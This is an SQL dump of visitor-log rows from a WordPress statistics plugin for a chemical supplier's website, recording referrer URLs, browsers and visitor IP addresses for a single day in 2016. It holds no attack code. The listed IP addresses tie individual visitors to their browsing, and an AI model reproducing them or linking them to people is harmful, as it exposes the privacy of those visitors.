INSERT INTO `wp_statistics_visitor` VALUES (12307, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '48.0.2564.109', '', '99.100.157.126', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12308, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.132.179.58', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12309, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '158.106.89.16', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12310, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '46.28.105.140', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12311, '2016-10-26', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiap4yLi_nPAhULOj4KHbSJCuAQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fepoxy-resins%2Fepikure-curing-agents%2Fepikure-w-composites%2F&usg=AFQjCNHzMMm4nfWayelq-CkvH8QGcxHOCg&bvm=bv.136593572,d.cWw', 'MSIE', 'Windows', '11.0', '', '141.189.251.16', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12312, '2016-10-26', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjc2LvHi_nPAhUGez4KHRFuAXYQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136593572,d.cWw', 'MSIE', 'Windows', '11.0', '', '10.5.16.141', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12313, '2016-10-26', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjpv7Cqi_nPAhXRl34KHVm8BW8YABAP&sig=AOD64_0KXWcbyzKDgFbVAPZ0RJAxsEKv1g&rct=j&q=&ved=0ahUKEwjMuKeqi_nPAhVL62MKHbtIAUAQ0QwIfg&adurl=', 'Firefox', 'Windows', '17.0', '', '208.81.181.36', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12314, '2016-10-26', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.1', '', '17.115.236.228', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12315, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.167.131.216', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12316, '2016-10-26', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwjxkpibjPnPAhXihVQKHaD4DTYQFgguMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-815c%2F&usg=AFQjCNGBhFPZy83Wvi4ze28ZHEHlBywcdA', 'MSIE', 'Windows', '11.0', '', '216.21.163.27', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12317, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '48.0.2564.116', '', '64.215.193.254', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12318, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.29.124.148', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12319, '2016-10-26', 'https://fototravel.eu/', 'MSIE', 'Windows', '6.0', '', '176.8.88.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12320, '2016-10-26', 'https://filmgo.ru/', 'MSIE', 'Windows', '7.0a1', '', '176.8.88.141', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12321, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '68.1.195.213', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12322, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.47.183.160', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12323, '2016-10-26', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwiN3NSZkfnPAhXLJCYKHRkWB5QQFghyMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-100%2F&usg=AFQjCNHPJSNGJ7C9DJ0T2ATyYgDAnAeKPA', 'MSIE', 'Windows', '11.0', '', '157.204.1.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12324, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '134.88.255.66', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12325, '2016-10-26', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwiYluy7kfnPAhUENGkKHbdkBwcYABAA&sig=AOD64_1QEm_suBG1ZUNf4Ka9gHEpFTilFQ&rct=j&q=&ved=0ahUKEwi5iue7kfnPAhVIx1QKHSTJAtUQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '142.59.222.129', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12326, '2016-10-26', 'https://www.google.com/aclk?sa=L&ai=DChcSEwirnNbjkvnPAhUJLmkKHdwbBfgYABAA&sig=AOD64_0u8oWtkqKZYIGHwsf4a4sHHjxO7g&rct=j&q=&ved=0ahUKEwjzh8zjkvnPAhWLjFQKHbHqDTEQ0QwIlgE&adurl=', 'MSIE', 'Windows', '11.0', '', '72.34.114.2', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12327, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.185.130.85', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12328, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '193.169.122.66', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12329, '2016-10-26', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj49f3xk_nPAhUHaRQKHY5cAg8QFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-114c%2F&usg=AFQjCNFA1dIG2X3JwG-1XdXvq1whgN7Bcg&bvm=bv.136593572,d.cWw&cad=rja', 'Firefox', 'Windows', '33.0', '', '98.109.101.115', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12330, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '93.35.182.203', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12331, '2016-10-26', 'https://www.miller-stephenson.com/', 'Safari', 'Macintosh', '10.0.1', '', '66.18.166.3', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12332, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.163.79.170', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12333, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.226.8.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12334, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.188.127.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12335, '2016-10-26', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj_laiRlfnPAhVCKCYKHTtHCCwQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136593572,d.eWE', 'MSIE', 'Windows', '11.0', '', '209.172.140.114', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12336, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '192.254.68.126', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12337, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '172.16.147.44', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12338, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '50.206.161.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12339, '2016-10-26', 'https://www.google.com.ua/', 'Chrome', 'Android', '54.0.2840.68', '', '46.211.112.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12340, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '207.255.178.54', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12341, '2016-10-26', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwjOk7Sil_nPAhWmj1QKHVvUBKgQFgg6MAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-828%2F&usg=AFQjCNG-ULz5hPi_elA0tDheufF5SIOMyg', 'MSIE', 'Windows', '11.0', '', '149.63.0.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12342, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '192.158.48.162', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12343, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.85', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12344, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12345, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.11', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12346, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '64.80.58.66', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12347, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.129.208.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12348, '2016-10-26', 'https://www.google.cl/', 'Chrome', 'Windows', '54.0.2840.71', '', '200.55.209.83', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12349, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '147.108.253.253', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12350, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.63.155.158', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12351, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.9.156.115', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12352, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12353, '2016-10-26', 'https://www.bing.com/search?q=miller%2055%20BACKUS%20AVE%20DANBURY%2C%20CT%2006810&qs=n&form=QBRE&pq=miller%2055%20backus%20ave%20danbury%2C%20ct%2006810&sc=0-38&sp=-1&sk=&cvid=7B8237A34F044627BF530766DCA48A48', 'Chrome', 'Windows', '54.0.2840.71', '', '208.80.25.77', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12354, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12355, '2016-10-26', 'https://www.google.ca/', 'Chrome', 'Windows', '48.0.2564.116', '', '69.158.96.240', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12356, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12357, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.134.46.210', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12358, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.12.243.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12359, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.145.64.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12360, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.106.105.212', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12361, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.122.115.111', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12362, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '2.0.0.6', '', '86.105.212.76', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12363, '2016-10-26', 'https://www.miller-stephenson.com', 'CrunchBot', 'Unknown', '1.0', '', '54.87.155.191', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12364, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '100.32.170.18', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12365, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.21.36.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12366, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '53.0.2785.124', '', '68.37.45.176', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12367, '2016-10-26', 'https://www.google.com.mx/', 'Chrome', 'Windows', '54.0.2840.71', '', '201.159.111.94', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12368, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '204.86.250.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12369, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.13.112.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12370, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '88.147.151.150', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12371, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.12.33.106', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12372, '2016-10-26', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwiR-pmWovnPAhXEJiYKHRPsCXwQFghKMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fconformal-coatings%2F&usg=AFQjCNF6BrACSYYrQwxy3XIrHbh4DG7M6A', 'MSIE', 'Windows', '11.0', '', '50.129.168.201', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12373, '2016-10-26', 'https://www.google.de', 'Firefox', 'Windows', '42.0', '', '87.135.38.128', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12374, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.11.9600.18499', '', '173.167.26.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12375, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.135.215.138', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12376, '2016-10-26', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '162.74.250.245', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12377, '2016-10-26', 'https://www.google.com', 'Firefox', 'Macintosh', '45.0', '', '128.197.72.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12378, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '62.210.111.70', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12379, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.56.55.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12380, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '50.201.236.186', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12381, '2016-10-26', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiN68jSp_nPAhVDXhoKHQTmAj4QFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '50.202.163.242', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12382, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '174.49.219.132', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12383, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.144.142.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12384, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '63.88.113.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12385, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12386, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.148', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12387, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.194.243.147', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12388, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '96.91.48.161', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12389, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.206.249.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12390, '2016-10-26', 'https://www.miller-stephenson.com/product/krytox-ts4-thread-sealant/', 'Chrome', 'Windows', '51.0.2704.84', '', '174.78.176.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12391, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.210.0.9', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12392, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.206.192.196', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12393, '2016-10-26', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjl4ceUrfnPAhUCOD4KHZjiCbsQFggfMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Furethane-conformal-coatings%2F&usg=AFQjCNGTCaQRTrQwoKXeOJIZqdyqfOBDjw&bvm=bv.136593572,d.cWw', 'MSIE', 'Windows', '11.0', '', '206.208.38.2', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12394, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.73.70.214', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12395, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '129.49.32.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12396, '2016-10-26', 'https://r.search.yahoo.com/_ylt=A0LEVvFkGBFYGD8ABxYPxQt.;_ylu=X3oDMTByNXM5bzY5BGNvbG8DYmYxBHBvcwMzBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1477544165/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproduct%2fepikure-w%2f/RK=0/RS=9zKyc539y.oMwIH5k3mC0TjX2BQ-', 'MSIE', 'Windows', '11.0', '', '24.35.232.105', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12397, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '24.38.44.147', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12398, '2016-10-26', 'https://www.miller-stephenson.com', 'CrunchBot', 'Unknown', '1.0', '', '54.145.226.223', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12399, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.125.103', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12400, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.85.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12401, '2016-10-26', 'https://www.miller-stephenson.com', 'CrunchBot', 'Unknown', '1.0', '', '54.160.211.250', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12402, '2016-10-26', 'https://www.miller-stephenson.com', 'CrunchBot', 'Unknown', '1.0', '', '54.165.98.223', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12403, '2016-10-26', 'https://www.miller-stephenson.com', 'CrunchBot', 'Unknown', '1.0', '', '52.90.127.149', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12404, '2016-10-26', 'https://www.miller-stephenson.com', 'CrunchBot', 'Unknown', '1.0', '', '54.196.8.13', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12405, '2016-10-26', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiMucTvr_nPAhUDBWkKHf_-AHkYABAA&sig=AOD64_1A4E6b5cGX5S1041m6Ma3dlhJxGA&rct=j&q=&ved=0ahUKEwjjhcHvr_nPAhXCUiYKHSelANMQ0QwIWQ&adurl=', 'MSIE', 'Windows', '11.0', '', '64.129.61.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12406, '2016-10-26', 'https://www.miller-stephenson.com', 'CrunchBot', 'Unknown', '1.0', '', '52.90.132.112', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12407, '2016-10-26', 'https://www.miller-stephenson.com', 'CrunchBot', 'Unknown', '1.0', '', '52.91.198.120', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12408, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12409, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12410, '2016-10-26', 'https://www.miller-stephenson.com', 'CrunchBot', 'Unknown', '1.0', '', '54.205.184.141', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12411, '2016-10-26', 'https://www.google.com/', 'Edge', 'Windows', '13.10586', '', '50.204.70.202', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12412, '2016-10-26', 'https://www.miller-stephenson.com', 'CrunchBot', 'Unknown', '1.0', '', '54.227.183.180', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12413, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '10.23.21.203', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12414, '2016-10-26', 'https://www.miller-stephenson.com', 'CrunchBot', 'Unknown', '1.0', '', '54.152.239.222', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12415, '2016-10-26', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj_i-34s_nPAhVPW4YKHUrfALoYABAA&sig=AOD64_14ZAmNDMhlYHb97TXqCLI-4BvCOQ&rct=j&q=&ved=0ahUKEwiA8uf4s_nPAhVLVj4KHeVYBBYQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '63.149.147.146', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12416, '2016-10-26', 'https://www.miller-stephenson.com', 'CrunchBot', 'Unknown', '1.0', '', '54.157.247.120', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12417, '2016-10-26', 'https://www.miller-stephenson.com', 'CrunchBot', 'Unknown', '1.0', '', '54.197.27.159', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12418, '2016-10-26', 'https://www.miller-stephenson.com', 'CrunchBot', 'Unknown', '1.0', '', '54.164.81.103', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12419, '2016-10-26', 'https://www.miller-stephenson.com', 'CrunchBot', 'Unknown', '1.0', '', '54.173.200.77', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12420, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.9.226.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12421, '2016-10-26', 'https://www.miller-stephenson.com', 'CrunchBot', 'Unknown', '1.0', '', '54.175.236.53', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12422, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.20.205.223', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12423, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.61.182.125', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12424, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '76.219.237.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12425, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '206.169.185.35', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12426, '2016-10-26', 'https://www.google.com/search?sclient=tablet-gws&q=hexion+Epon+resin+828&oq=hexion+Epon+resin+828&gs_l=tablet-gws.3..0j0i22i30k1l2.205406.231325.1.232133.18.13.0.5.5.0.1201.4082.2-5j2j6-1j1.9.0....0...1c.1.64.tablet-gws..4.14.4134...0i67k1.IGx55oyggk4', 'Safari', 'iPad', '5.1', '', '166.170.14.36', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12427, '2016-10-26', 'https://www.miller-stephenson.com', 'CrunchBot', 'Unknown', '1.0', '', '54.237.215.197', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12428, '2016-10-26', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '600.1.4', '', '38.140.87.36', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12429, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '82.149.218.246', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12430, '2016-10-26', 'https://www.miller-stephenson.com', 'CrunchBot', 'Unknown', '1.0', '', '54.87.144.188', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12431, '2016-10-26', 'https://www.google.com.mx/', 'Chrome', 'Windows', '53.0.2785.143', '', '177.224.123.75', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12432, '2016-10-26', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '187.158.224.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12433, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.74.109.52', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12434, '2016-10-26', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiHgd-Ou_nPAhVKWoYKHUG7AEMYABAA&sig=AOD64_34Uu3_iG30Coi9L-cRMcCi31E2HQ&rct=j&q=&ved=0ahUKEwiYsduOu_nPAhXG5SYKHcH5DMIQ0QwIHA&adurl=', 'MSIE', 'Windows', '11.0', '', '172.0.192.110', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12435, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.176.7.182', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12436, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.57.31.38', '000', 1, 0); 
